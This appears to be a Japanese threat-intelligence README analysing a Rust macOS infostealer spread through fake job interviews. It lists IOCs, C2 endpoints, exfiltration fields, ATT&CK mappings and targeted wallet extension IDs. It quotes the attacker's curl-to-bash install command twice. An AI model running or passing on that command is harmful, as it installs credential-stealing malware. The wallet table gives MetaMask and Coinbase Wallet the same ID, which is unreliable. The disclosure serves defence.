
HyperHivesのmacOS Rust情報窃取マルウェアの完全静的解析 — 571件の復号化された設定値、C2インフラストラクチャ、DPRK/Contagious Interviewの帰属、YARA/Sigmaルール、STIX 2.1バンドル、ATT&CK Navigatorレイヤー
脅威インテリジェンス: Rust製のmacOSユニバーサルバイナリのインフォスティーラーで、Wellfound(旧AngelList)上の偽の求人面接パイプラインを通じて配布されました。オペレーターのペルソナ「HyperHive」の「Felix」が、ターゲットに
macos.hyperhives.netからの悪意のあるインストーラーを実行するよう誘導しました。このリポジトリは完全な静的解析を文書化しており、571個の暗号化された設定値(C2 URL、Sentry DSN、**276個の標的とされたChrome拡張機能IDを含む)が復元されています。
| サンプルSHA-256 | 5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3 |
| C2ドメイン | cloudproxy.link |
| 配布ドメイン | macos.hyperhives.net |
| 誘引プラットフォーム | Wellfound(旧AngelList) |
| オペレーターペルソナ | 「HyperHive」の「Felix」 |
| VirusTotal | 9 / 63 検出 |
| 分類 | 公開開示 / IOCバンドル |
| 最終更新 | 2026年4月 |
. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist
---
## クイックスタート
サンプルを `sample/installer_binary` として配置します(ハッシュ検証については[`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md)を参照)、その後:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py
composeファイルは network_mode: none, read_only: true を強制し、すべてのLinuxケーパビリティを削除します。完全な取り扱いガイドラインについては SECURITY.md を参照してください。
Wellfound(旧AngelList)の求人投稿が、オペレーターのペルソナ "Felix"("HyperHive")による複数メールのソーシャルエンジニアリング連鎖を引き起こしました。ターゲットの技術的背景を褒め称え、偽の面接を設定した後、攻撃者は被害者に hyperhives.net の「製品を確認する」ように指示し、特に Settings → Diagnostics → Log を調べるよう指示しました。これは次の実行を引き起こすための口実です:```
curl -s https://macos.hyperhives.net/install | nohup bash &
ペイロードは、Rustでコンパイルされた**8.5 MBのMach-Oユニバーサルバイナリ**(x86_64 + arm64)です。エアギャップされたDockerラボと**570個のユニークなx86_64ヘルパールーチン**のCPUエミュレーションによる静的解析により、**すべての571個の暗号化された設定値**が復元され、以下が明らかになりました:
- **C2:** `cloudproxy.link` — 4つのHTTPSエンドポイント
- **Sentry(属性のピボット):** `ingest.de.sentry.io`上の組織/プロジェクトIDを含む完全なDSN
- **ビルドの識別:** Cargoユーザー `rootr`、コードネーム `force`、バージョン `9.12.1`
- **ターゲット:** 276個のChrome拡張機能ID(暗号通貨ウォレット、パスワードマネージャー、企業認証情報)
戦術は**DPRK関連のContagious Interview**キャンペーンと一致しています — 正当なプラットフォームでの偽の求人、多段階の信頼構築、`curl | bash`による配信、Rust macOSスティーラー、暗号資産に焦点を当てた流出。
---
## 1 — 始まりの経緯
### 誘餌: Wellfoundでの偽の面接
攻撃は、**Wellfound**(旧AngelList)での**正当に見える求人情報**から始まりました。標的が応募した後、ペルソナ**「Felix」**と会社名**「HyperHive」**を使用するオペレーターからの以下のメールのやり取りが続きました:
**Email 1**(2026年4月4日) — 最初の連絡。「Felix」は標的の履歴書とLinkedInを確認し、自分たちの「Tech Lead」が先に進めることを承認したと述べ、標的の実際の技術経験に具体的に言及しました。メールでは、HyperHiveが「さまざまなオペレーティングシステム向けにHyperhivesのデスクトップ版を構築している」と述べ、UTC+0での面接の日程調整を招待しました。
**Email 2**(2026年4月5日) — フォローアップの日程調整。特定の面接枠(4月8日15:00 UTC)を提案し、重要なペイロード配信の指示が含まれていました:
> *"可能であれば、**設定 → 診断 → ログ**にある製品ログも簡単にご確認ください。ログやその他気づいた製品の観察事項について簡単なコメントを求めさせていただく場合があります。これは、エンジニアリングの経験と細部への注意力を測る良い指標となることが多いためです。"*
これにより、標的は`https://hyperhives.net`に誘導され、診断セクションに移動すると以下がトリガーされました:```
curl -s https://macos.hyperhives.net/install | nohup bash &
コマンドは8.5 MBのMach-Oユニバーサルバイナリをダウンロードして実行しました。AppleScriptを介して偽のmacOSパスワードダイアログが表示されました。パスワードは入力されませんでした。 プロセスは直ちに終了され、サンプルは分析のために保存されました。
このサンプルはプロダクションレベルの設計を示しています。セマンティックバージョニング、運用信頼性のためのSentry統合、および570個のユニークなヘルパー関数で暗号化された大規模な組み込み設定を含んでいます。
フルレポート — 初回提出時(2026年4月)に63エンジン中9エンジン検出。85%以上のエンジンがこのサンプルを検出できませんでした。
特筆すべきベンダーファミリー名(クロスリファレンス用): HashBreaker (Kaspersky), JobStealer (DrWeb), PSW.Agent.BX (ESET), Stealer-BU (Avast/AVG)。
未検出: BitDefender, CrowdStrike Falcon, Sophos, Symantec, McAfee, Malwarebytes, TrendMicro, Fortinet, ClamAV, Panda、およびその他44エンジン。この低い検出率は、このキャンペーンで使用されたRust + カスタム難読化アプローチの運用効果を浮き彫りにしています。
検出率はベンダーがシグネチャを更新するにつれて変化します。最新の結果については、VirusTotalレポートを確認してください。
窃取されるデータタイプ: パスワード、クレジットカード、クッキー、セッショントークン、自動入力情報、閲覧履歴。
login.keychain-db) — 偽のダイアログで収集したユーザーパスワードが必要IOPlatformExpertDevice / IOPlatformUUID、C2に hardwares として報告tdata セッション資料ブラウザ拡張機能ウォレット(MetaMask、Phantom、Trust Wallet、Ronin、Exodus、OKX、Bybit、Bitget、SubWallet、Ledger Live、Trezor Suiteなど)の包括的なターゲティング。完全なマッピングはセクション8および output/full_decrypted_config.json を参照。
| 機能 | 詳細 |
|---|---|
| VM検出 | C2 JSON内の is_vm フラグ |
| 強制モード | リモートオーバーライドフラグ |
データは ~/Documents/temp_data/Application/ にステージングされ、ZIPに圧縮され、HTTPS経由で multipart/form-data としてアップロードされます。被害者のIPと地理位置情報は https://freeipapi.com/api/json で解決されます。
| エンドポイント | 役割 |
|---|---|
https://cloudproxy.link/m/opened | ビーコン / アクティベーション |
https://cloudproxy.link/m/metrics | テレメトリ |
https://526eff9f8bb7aafd7117ca5e33a6a183@o4509139651198976.ingest.de.sentry.io/4509422649213008
| コンポーネント | 値 |
|-----------|-------|
| **公開鍵** | `526eff9f8bb7aafd7117ca5e33a6a183` |
| **Organization ID** | `4509139651198976` |
| **Project ID** | `4509422649213008` |
| **リージョン** | EU — `ingest.de.sentry.io` |
Sentryに対する合法的なプロセスにより、この組織/プロジェクトに関連付けられたアカウント登録情報、請求記録、アクセスメタデータが取得される可能性があります。
### ジオロケーションAPI
`https://freeipapi.com/api/json` — C2 JSON用の被害者IP/国情報 (`ipAddress`, `countryCode`)。
### C2流出プロトコル
| フィールド | 役割 |
|-------|------|
| `buildName` / `buildVersion` | `force` / `9.12.1` |
| `uid`, `log_id` | 被害者 / セッション識別子 |
| `ip`, `geo` | ジオロケーションAPIから |
| `pers_password` | 偽ダイアログのパスワード |
| `passwords`, `wallets`, `credits`, `autofills` | 盗難データ |
| `is_vm`, `hardwares`, `force_mode` | 環境 / 制御フラグ |
アップロード方式: `multipart/form-data`, `application/zip`, 接続文字列 `UPLD connect`。
---
## 5 — 属性特定
### 侵害指標 (IoC)
| 指標 | 値 | ソース |
|-----------|-------|--------|
| 誘引プラットフォーム | Wellfound (AngelList) | 被害者の報告 |
| 攻撃者ペルソナ | "Felix" (所属"HyperHive") | 誘引メール |
| 誘引用ウェブサイト | `hyperhives.net` | 誘引メール |
| 送信者メール | `[email protected]` | 誘引メール |
| 配信ドメイン | `macos.hyperhives.net` | ペイロードダウンロード |
| 配信IP | `81.28.12.12` (Gcore CDN) | DNS解決 |
| レジストラ / メール | Tucows; Spacemail | WHOIS / MX |
| **C2ドメイン** | **`cloudproxy.link`** | **サンプルから復号** |
| **Sentry DSN** | [第4節](#sentry-dsn-operator-fingerprint)を参照 | **サンプルから復号** |
| ビルドユーザー | `rootr` | 埋め込まれたCargoパス |
| サンプルSHA-256 | `5c7385c3...bf8dd3` | ファイルハッシュ |
### 開発者ハンドル: `rootr`
埋め込みパス `/Users/rootr/.cargo/registry/`。ハンドルに関するOSINT — [github.com/rootr](https://github.com/rootr) (分析日現在): 登録企業 "RootR"、所在地ジュネーブ、アカウント作成 **2024-06-27**、公開リポジトリなし。使い捨てまたは運用用プロファイルと一致。
### DPRK / Contagious Interview (分析評価)
| TTP | 本サンプル | 報告されているDPRK関連パターン |
|-----|-------------|--------------------------------|
| **正規プラットフォームでの偽の求人勧誘** | Wellfound (AngelList) 投稿 → "Felix"とのメール連絡 | Contagious Interview: LinkedIn, Indeed, Wellfoundでの偽採用者による勧誘 |
| **多段階のソーシャルエンジニアリング** | 実際の履歴書に言及した2通以上のメール、偽の面接日程調整 | 信頼構築後ペイロード配信; 複数のDPRKキャンペーンで文書化 |
| **製品レビュー/コードテストの口実** | "設定 → 診断 → ログを確認" | "プロジェクトをレビューしてほしい" / "このコードテストを実行してほしい" といった口実 |
| `curl \| bash` による配信 | `macos.hyperhives.net` からのインストールワンライナー | 一般的なmacOSソーシャルエンジニアリングベクター |
| Rust Mach-O ユニバーサルバイナリ | rustc 1.87.0, x86_64 + arm64 | RustDoor / RustBucket / 類似クラスター |
| 偽のパスワードダイアログ | AppleScript `osascript` | 関連するmacOSキャンペーンで文書化 |
| 多数の暗号通貨ウォレットターゲット | 276個の拡張機能ID, 188個のウォレット名 | DPRKの収益生成と一致する金銭的動機 |
**確信度:** テーマ及びTTPの一致について**高**。Wellfoundの偽求人パイプライン、複数メールによる信頼チェーン、製品レビューの口実、Rust製macOSスティーラー、暗号ウォレットへの焦点は、Contagious Interviewのプレイブックと密接に一致する。これは分析評価であり、政府機関や法執行機関による属性特定声明ではない。
---
## 6 — 暗号解析
設定文字列は**カスタムXOR暗号**によって保護されている: 570個の小さなx86_64ヘルパー関数 (コード範囲 `0x10000`–`0x15000`) がそれぞれ `(data_ptr, seed)` からユニークな16ビットオフセットを計算する。このオフセットはバイナリ内をインデックスして32バイトのXOR鍵を生成し、対応する暗号文ブロックに適用される。
### 失敗したアプローチ
| 手法 | 結果 |
|--------|---------|
| 単純なXOR総当たり | 意味のある平文は得られず |
| AES / PBKDF2鍵推測 | 鍵スケジュールは見つからず |
| UnicornによるRustランタイム全体のエミュレーション | 制御フローの複雑さにより発散 |
### 成功したアプローチ
1. RIP相対 `LEA` 命令で設定領域 (`0x2b8000`–`0x2bc000`) を狙うものを**スキャン**する。
2. 先行コードを**パース**し、`(helper_function_address, data_pointer, seed)` を抽出する。
3. 各ヘルパーを [Unicorn Engine](https://www.unicorn-engine.org/) で**単独エミュレート**する (最大200命令)。
4. 計算されたオフセットにある鍵を用いて、ターゲットアドレスの32バイトブロックを**XOR復号**する。
5. 複数ブロック文字列 (URL, DSN) および OR+XORメタデータエントリのために**拡張**する。
**カバレッジ:** 381 XORブロック + 190 OR+XORメタデータエントリ = **571個の設定値が1.1秒で復元**。未復号の暗号化エントリはゼロ。
**実装:** [`scripts/decrypt_all.py`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/scripts/decrypt_all.py)
---
## 7 — MITRE ATT&CKマッピング
> [`attack-navigator-layer.json`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/attack-navigator-layer.json) を [ATT&CK Navigator](https://mitre-attack.github.io/attack-navigator/) にインポートしてインタラクティブに表示できます。
| 技術 | ID | 本サンプルでの使用例 |
|-----------|----|--------------------|
| フィッシング | T1566 | `[email protected]` からのソーシャルエンジニアリングメール |
| ユーザー実行: 悪意のあるファイル | T1204.002 | 誘引からの `curl \| bash` |
| コマンドおよびスクリプティングインタプリタ: AppleScript | T1059.002 | 偽のパスワードダイアログ、Apple Notesの流出 |
| コマンドおよびスクリプティングインタプリタ: Unixシェル | T1059.004 | パイプされたbashによる初期実行 |
| パスワードストアからの資格情報: キーチェーン | T1555.001 | ログインキーチェーンの抽出 |
| パスワードストアからの資格情報: Webブラウザからの資格情報 | T1555.003 | Chromiumログインデータの復号 |
| WebセッションCookieの窃取 | T1539 | ブラウザCookieおよびトークンの窃取 |
| ローカルシステムからのデータ | T1005 | ウォレット、Telegram、Notes、自動入力 |
| 収集データのアーカイブ | T1560 | `~/Documents/temp_data/` 下でのZIPステージング |
| C2チャネルを介した流出 | T1041 | `cloudproxy.link` へのHTTPS POST |
| アプリケーション層プロトコル: Webプロトコル | T1071.001 | 4つのエンドポイントを持つHTTPS C2 |
| 仮想化/サンドボックス回避 | T1497 | `is_vm` フラグ |
| 難読化されたファイルまたは情報 | T1027 | 570個のXORヘルパー関数 |
| 入力キャプチャ | T1056 | 偽のパスワードダイアログ |
| システム情報の探索 | T1082 | ハードウェアIDとOSバージョンの収集 |
| システムネットワーク構成の探索 | T1016 | `freeipapi.com` ジオロケーション |
| 信頼制御の無効化: Gatekeeperバイパス | T1553.001 | ダウンロードしたバイナリに対する `xattr -c` |
---
## 8 — ウォレットおよび拡張機能IDリファレンス
188個のウォレット名と**276個の**ユニークな32文字のChrome拡張機能IDが復元された。以下の表は注目すべきターゲットを示す。完全なリストは [付録A](#appendix-a--all-276-chrome-extension-ids) および `output/full_decrypted_config.json` にある。
| ウォレット | 拡張機能ID |
|--------|--------------|
| MetaMask | `hnfanknocfeofbddgcijnmhnfnkdnaad` |
| Phantom | `bfnaelmomeimhlpmgjnjophhpkkoljpa` |
| Trust Wallet | `egjidjbpglichdcondbcbdnbeeppgdph` |
| Ronin | `fnjhmkhhmkbjkkabndcnnogagogbneec` |
| Exodus Web3 | `aholpfdialjgjfhomihkjbmgjidlcdno` |
| OKX | `mcohilncbfahbmgdjkbpemcciiolgcge` |
| Bybit | `pdliaogehgdbhbnmkklieghmmjkpigpa` |
| Bitget | `jiidiaalihmmhddjgbnbgdfflelocpak` |
| SubWallet | `onhogfjeacnfoofkfgppdlbmlmnplgbn` |
| Coinbase Wallet | `hnfanknocfeofbddgcijnmhnfnkdnaad` |
**デスクトップウォレット:** Ledger Live および Trezor Suite のデータディレクトリも標的にされています。
**重要:** これらの拡張機能IDは、マルウェアがデータ窃取の対象とする**正規のブラウザ拡張機能**を識別します。これらは**悪意のある拡張機能ではありません**。
---
## 9 — 推奨される対策
### 被害を受けた可能性のあるユーザー向け
- 未知の `curl | bash` ワンライナーを**実行しないでください**
- 露出した可能性がある場合、ブラウザに保存されたすべての認証情報、暗号通貨ウォレットキー、パスワードマネージャーのマスターパスワードをローテーションしてください
- ディスクに `~/Documents/temp_data/` が存在しないか確認してください
- 地元の法執行機関および関連国のCERT (例: IC3, NCSC) に報告してください
### 防御者向け
- `macos.hyperhives.net`, `cloudproxy.link`, `81.28.12.12` を**ブロック**してください (IPブロック前に共有ホスティングへの影響を確認)
- `cloudproxy.link` へのHTTPSトラフィックおよび両ドメインへのDNSクエリを**ハント**してください
- このリポジトリのYARAおよびSigmaルールを**展開**してください (環境に合わせてチューニング)
- インストールされているChrome拡張機能を276IDリストと**比較**してください (拡張機能は正規のもので、マルウェアはそのローカルデータを読み取ります)
- `stix/bundle.json` をCTIプラットフォーム (MISP, OpenCTI, ThreatConnect など) に**インポート**してください
### 法的手続きのための情報
| 対象 | リクエストする内容 |
|--------|-----------------|
| Sentry | 組織 `4509139651198976` のアカウントおよび請求記録 |
| ドメインレジストラ | `cloudproxy.link` および `hyperhives.net` のWHOISレコード |
| Gcore CDN | `81.28.12.12` のアクセスログ |
| メールプロバイダ | `[email protected]` のアカウント記録 |
| GitHub | `rootr` のアカウントメタデータ |
---
## 10 — 方法論
分析は**Dockerコンテナ**内で以下の設定で実施:
- `network_mode: none` (外部接続なし)
- `read_only: true` (ルートファイルシステム不変)
- すべてのLinuxケイパビリティをドロップ (`cap_drop: ALL`)
- `no-new-privileges` セキュリティオプション
使用ツール: Python (LIEF, Unicorn Engine, Capstone, r2pipe), Radare2, およびカスタムスクリプト。マルウェアの動的実行は一切行わず、すべての知見は静的解析および個々のヘルパー関数の隔離されたCPUエミュレーションに基づく。
検証済みアーティファクト: [`scripts/decrypt_all.py`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/scripts/decrypt_all.py), [`output/full_decrypted_config.json`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/output/full_decrypted_config.json).
---
## 付録A — 全276個のChrome拡張機能ID
マルウェア設定はこれらの拡張機能IDを参照しています (ユーザープロファイル下のlocal-storage / LevelDBパス)。**これらのIDはデータ窃取の対象となる正規の拡張機能を識別するものであり、悪意のある拡張機能ではありません。**```
abkahkcbhngaebpcgfmhkoioedceoigp abogmiocnneedmmepnohnhlijcjpcifd
acmacodkjbdgmoleebolmdjonilkdbch aeachknmefphepccionboohckonoeemg
aeblfdkhhhdcdjpifhhbdiojplfjncoa afbcbjpbpfadlkmhmclhkeeodmamcflc
afccgfbnbpgfdokbllhiccepgggofoco aflkmfhebedbjioipglgcbcmnbpgliof
agoakfejjabomempkjlepdflaleeobhb ahkpfejaeoepmfopmbhjgjekibmfcfgo
aholpfdialjgjfhomihkjbmgjidlcdno aiifbnbfobpmeekipheeijimdpnlpgpp
aijcbedoijmgnlmjeegjaglmepbmpkpi ajofhbfomojicfifgoeeimefklkfdkfn
ajopcimklncnhjednieoejhkffdolemp akckefnapafjbpphkefbpkpcamkoaoai
akkmagafhjjjjclaejjomkeccmjhdkpa algblmhagnobbnmakepomicmfljlbehg
amdcajcnofodjpgbbdnnjkffamfnidae amkmjjmmflddogmhpjloimipbofnfjih
ammjlinfekkoockogfhdkgcohjlbhmff anokgmphncpekkhclmingpimjmcooifb
aodkkagnadcbobfpggfnjeongemjbjca aoedbjimepepemdafoodplnknfkmbnle
apgjfbcibghlclbdiipmojppngeilcol bbjmepflljbbfaehppakknfgdnojoled
bccippoanbhflmokhkbkepmhmndijenh bcpialkijhffpgnmgjhjmdeabdbbfmbo
bdgmdoedahdcjmpmifafdhnffjinddgc bfeplaecgkoeckiidkgkmlllfbaeplgm
bflldjbbpcjgooclhpmhdhioebmnnkcm bfnaelmomeimhlpmgjnjophhpkkoljpa
bgjogpoidejdemgoochpnkmdjpocgkha bhhhlbepdkbapadjdnnojkbgioiodbic
bhmbcdekobebkhmloafbjfdcphbmpcnm bidcmgjdfgkagkleecdockomdjlgglbg
bifidjkcdpgfnlbcjpdkdcnbiooooblg blnieiiffboillknjnepogjhkgnoapac
bmkakpenjmcpfhhjadflneinmhboecjf bmmhjnaohafphhlecmkkiaaglcebcapn
bodadjcgfgigmmnambomndppidgdjlni bplepbelihejfpcjoeialhjpamgpnfln
caalbmclnkldkcgcdkfiapoopikbofnl cgeeodpfagjceefieflmdfphplkenlfk
cihmoadaighcejopammfbmddcmdekcje ciojocpkclfflombbcfigcijjcbkmhaf
cjelfplplebdjjenllpjcblmjkfcffne ckklhkaabbmdjkahiaaplikpdddkenic
cmbagcoinhmacpcgmbiniijboejgiahi cmoakldedjfnjofgbbfenefcagmedlga
cnmbailpgmdagpofalkeoeooefdkjfdl cnncmdhjacpkmjmkcafchppbnpnhdmon
cnoepnljjcacmnjnopbhjelpmfokpijm codfcglpplgmmlokgilfkpcjnmkbfiel
cpmkedoipcpimgecpmgpldfpohjplkpp dbgnhckhnppddckangcjbkjnlddbjkna
dcbjpgbkjoomeenajdabiicabjljlnfp dfbacijefbcabjnngipfnbhcpoldlkcg
dkdedlpgdmmkkfjabffeganieamfklkm dlcobpjiigpikoobohmabehhmhfoodbb
dldjpboieedgcmpkchcjcbijingjcgok dmjmllblpcbmniokccdoaiahcdajdjof
dngmlblcodfobpdpecaadgfbcggfjfnm dpcklmdombjcplafheapiblogdlgjjlb
dpdmipjakdiapplcecdmgckknipnfjph dpealdfjgahljjdekeiadjnfgpijffhg
dpmfhilhjlhhakpbieclcghochdofeao eaeecbmeajhliilmacefcgjnnijkkfki
ebaeifdbcjklcmoigppnpkcghndhpbbm ebfidpplhabeedpnhjnobghokpiioolj
efbglgofoippbgcjepnhiblaibcnclgk egjidjbpglichdcondbcbdnbeeppgdph
ehgjhhccekdedpbkifaojjaefeohnoea ehjiblpccbknkgimiflboggcffmpphhp
ejbalbakoplchlghecdalmeeeajnimhm ejbidfepgijlcgahbmbckmnaljagjoll
ejdmhlhkcfbkcoifejkcbonhodkgflgg ejjladinnckdgjemekebdpeokbikhfci
elalghlhoepcjfaedkcmjolahamlnjcp eljobehkpcnpekmbcjiidekjhkbcnpkf
ellkdbaphhldpeajbepobaecooaoafpg emafjfadeeammocialbgjbaeldmpddne
emeeapjkbcbpbpgaagfchmcgglmebnen emgcpdnckldpdhjgmkeeahfaokmhgpab
enabgbdfcbaehmbigakijjabdpdnimlg epapihdplajcdnnkdeiahlgigofloibg
fajmdbbmcncahahilpfdiacamedmgdlk fbplgegfggencanbeceipjpanlmgpkfi
fcckkdbjnoikooededlapcalpionmalo fcfcfllfndlomdhbehjjcoimbgofdncg
fcjkomdnccnlklmhncgmaehaakjkddnk fdchdcpieegfofnofhgdombfckhbcokj
fdcnegogpncmfejlfnffnofpngdiejii fdjamakpfbbddfjaooikfcpapjohcfmg
fhbohimaelbohpjbbldcngcnapndodjp fhilaheimglignddkjgofkcbgekhenbh
fhmmkjofdcpnoklcbcnbjjhigobceikb fihkakfobkmkjojpchpfgcmhfjnmnfpi
fijngjgcjhjmmpcmkeiomlglpeiijkld fjghjobbfggoacelnibacipoilennobn
fldfpgipfncgndfolcbkdeeknbbbnhcc fmpbldieijjehhalgjblbpgjmijencll
fnabdmcgpkkjjegokfcnfbpneacddpfh fnjhmkhhmkbjkkabndcnnogagogbneec
fnnegphlobjdpkhecapkijjdkgcjhkib fopmedgnkfpebgllppeddmmochcookhc
fpibioaihcagphbidhodidjbnclocgll fpkhgmpbidmiogeglndfbkegfdlnajnf
gbjepgaebckfidagpfeioimheabiohmg gdokollfhmnbfckbobkdbakhilldkhcj
gejiddohjgogedgjnonbofjigllpkmbf ghihpcdpbjaaomhlfnhdlocimojkinpm
ghlmndacnhlaekppcllcpcjjjomjkjpg ghmbeldphafepmbegfdlkpapadhbakde
gjlmehlldlphhljhpnlddaodbjjcchai gkeelndblnomfmjnophbhfhcjbcnemka
gkhnjcpkikkkfhhdhhphcbhmkikoicgn gkpbmnplcjdnnmmiaaphofhdiicdhfah
glhefpglgefbmegkpjkdgoikologepdl hbbgbephgojikajhfbomhlmmollphcad
hbdheoebpgogdkagfojahleegjfkhkpl hbinmkhlebcnghpikoekkbeljbealbje
hbneiaclpaaglopiogfdhgccebncnjmc hbnpcbochkgodkmmicbhfpmmkhbfbhim
hddkffjleepiafmkhcneldjipkfkkofk hdokiejnpimakedhajhdlcegeplioahd
heefohaffomkkkphnlpohglngmbcclhi hgbeiipamcgbdjhfflifkgehomnmglgk
hgnpaljkalilofmmbhgkkldbdbogddlo hifafgmccdpekplomjjkcfgodnhcellj
hlbmghfhijdlnllnnnakmcagdfhhkfna hmeobnfnfcmdkdcmlblgagmfpfboieaf
hnfanknocfeofbddgcijnmhnfnkdnaad hnhobjmcibchnmglfbldbfabcgaknlkj
hpbgcgmiemanfelegbndmhieiigkackl hpclkefagolihohboafpheddmmgdffjm
hpglfhgfnhbgpjdenjgmdgoeiappafln hpjiiechbbhefmpggegmahejiiphbmij
ibjflpbmadchofnbpppegdbnifdgincp ibljocddagjghmlpgihahamcghfggcjc
ibnejdfjmmkpcnlpebklmnkoeoihofec icmkfkmjoklfhlfdkkkgpnpldkgdmhoe
idnnbdplmphpflfnlkomgpfbpcgelopg idpfplgehakelkdadhcacicjjbemjbke
ifckdpamphokdglkkdomedpdegcjhjdp ifclboecfhkjbpmhgehodcjpciihhmif
ifgjklbmlnimhldbmddmkdhoahfocppf ikcpjgihikfinlkobegiiogdigohmfam
ilhaljfiglknggcoegeknjghdgampffk imlcamfeniaidioeflifonfjeeppblda
iokeahhehimjnekafflcihljlcjccdbe jaooiolkmfcmloonphpiiogkfckgciom
jbdaocneiiinmjbjlgalhcelgbejmnid jccapkebeeiajkkdemacblkjhhhboiek
jfdlamikmbghhapbgfoogdffldioobgl jfflgdhkeohhkelibbefdcgjijppkdeb
jhjebgdkdemiibiibgickfkilfpbelaj jhnilbocebbmeelaolalihfokjgdmogb
jicpmdkafljkkppgpellcjhfhdmjpogm jiepnaheligkibgcjgjepjfppgbcghmp
jiidiaalihmmhddjgbnbgdfflelocpak jjkhekbaikcnpnhflnnlnbonkkobkiim
jljjeghmeihjegifdhbghcoihdiegkkl jmgipjhlmabpmcikcahmmgleghckefjg
jnggcdmajcokeakpdeagdhphmkioabem jnldfbidonfeldmalbflbmlebbipcnle
jnlgamecbpmbajjfhmmmlhejkemejdma jojhfeoedkpkglbfimdfabpdfjaoolaf
kdgponmicjmjiejhifbjgembdcaclcib keenhcnmdmjjhincpilijphpiohdppno
kfdniefadaanbjodldohaedphafoffoh kgdijkcfiglijhaglibaidbipiejjfdp
khgocmkkpikpnmmkgmdnfckapcdkgfaf khpkpbbcccdmmclmpigdgddabeilkdpd
kilnpioakcdndlodeeceffgjdpojajlo kjjebdkfeagdoogagbhepmbimaphnfln
kkpehldckknjffeakihjajcjccmcjflh kkpllbgjhchghjapjbinnoddmciocphm
kkpllkodjeloidieedojogacfhpaihoh klghhnkeealcohjjanjjdaeeggmfmlpl
kmphdnilpmdejikjdnlbcnmnabepfgkh kncchdigobghenbbaddojjnnaogfppfj
kolfcecahpbgbilkdkalabnfjjklkkae kpfopkelmapcoipemfendmdcghnegimn
kppfdiipphfccemcignhifpjkapfbihd kppgpfphbmbcgeglphjnhnhibonmebkn
lccbohhgfkdikahanoclbdmaolidjdfl ldcihfaojdpmhjkhioilfjjckehehddg
lfmmjkfllhmfmkcobchabopkcefjkoip lgmpcpglpngdoalbgeoldeajfclnhafa
lkpmkhpnhknhmibgnmmhdhgdilepfghe llakdhpogpnejheknjbhbadoaomejgbi
lmkncnlpeipongihbffpljgehamdebgi lnnnmfcpbkafcpgdilckhmhbkkbpkmid
loinekcabhlmhjjbocijdoimmejangoa lpfcbjknijpeeillifnkikgncikgfhdo
lpilbniiabackdjcionkobglmddfbcjo magbanejlegnbcppjljfhnmfmghialkl
mapbhaebnddapnmifbbkgeedkeplgjmf mcbigmjiafegjnnogedioegffbooigli
mcohilncbfahbmgdjkbpemcciiolgcge mdjjoodeandllhefapdpnffjolechflh
mdjmfdffdcmnoblignmgpommbefadffd mdnaglckomeedfbogeajfajofmfgpoae
mfgccjchihfkkindfppnaooecgfneiii mfiealgchgibibbamfjebflnfjihfedk
mgbfflhghaohmaecmaggieniidindaoc mgfbabcnedcejkfibpafadgkhmkifhbd
mgffkfbidihjpoaomajlbgchddlicgpn mjgkpalnahacmhkikiommfiomhjipgjn
mkchoaaiifodcflmbaphdgeidocajadp mkjjflkhdddfjhonakofipfojoepfndk
mkpegjkblkkefacfnmkajcjmabijhclg mlbnicldlpdimbjdcncnklfempedeipj
mlhakagmgkmonhdonhkpjeebfphligng mmmjbcfofconkannjonfmjjajpllddbg
mnfifefkajgofkcjkemidiaecocnkjeh mnnkpffndmickbiakofclnpoiajlegmg
modjfdjcodmehnpccdjngmdfajggaoeh nanjmdknhkinifnkgdcggcfnhdaammmj
nankopfjhdflikcokhgohiaoehnjfako nbdhibgjnjpnkajaghbffjbkcgljfgdi
nbdpmlhambbdkhkmbfpljckjcmgibalo nebnhfamliijlghikdgcigoebonmoibm
nfaepmamdapehcbedhejbjcpnlcldodi nfinomegcaccbhchhgflladpfbajihdf
ngakogceekkandcbkniokoghdckjhhok nglnaekfdaelelcaokeemlnopjhekdkj
nhlnehondigmgckngjomcpcefcdplmgc nhnkbkgjikgcigadomkphalanndcapjk
niiaamnmgebpeejeemoifgdndgeaekhe njoljnomkdoakfphjbapdopdcneceeaf
nkbihfbeogaeaoehlefnkodbefgpgknn nkddgncdjgjfcddamfgcmfnlhccnimig
nknhiehlklippafakaeklbeglecifhad nlbmnnijcnlegkjjpcfjclmcfggfefdm
nlgnepoeokdfodgjkjiblkadkjbdfmgd nopnfnlbinpfoihclomelncopjiioain
nphplpgoakhhjchkkhmiggakijnkhfnd ocjdpmoallmgmjbbogfiiaofphbjgchh
ocjobpilfplciaddcbafabcegbilnbnb ocmccklecaalljlflmclidjeclpcpdim
odbfpeeihdkbihmopkbjmoonfanlbfcl oehdbmfbnjnpahadljbdcjndmepmgjgl
ofeeamlegilfbjlgbephmdhchpblfigo ohjgojhmjldjfiningdelbffpnddmiphh
ojggmchlghnjlapmfbnjholfjkiidbch oklkeijlcjcpbokmkmnjepjhnggkfkcl
oldojieloelkkfeacfinhcngmbkepnlm olgpchjlegmakkhfbahgnjojlefnealp
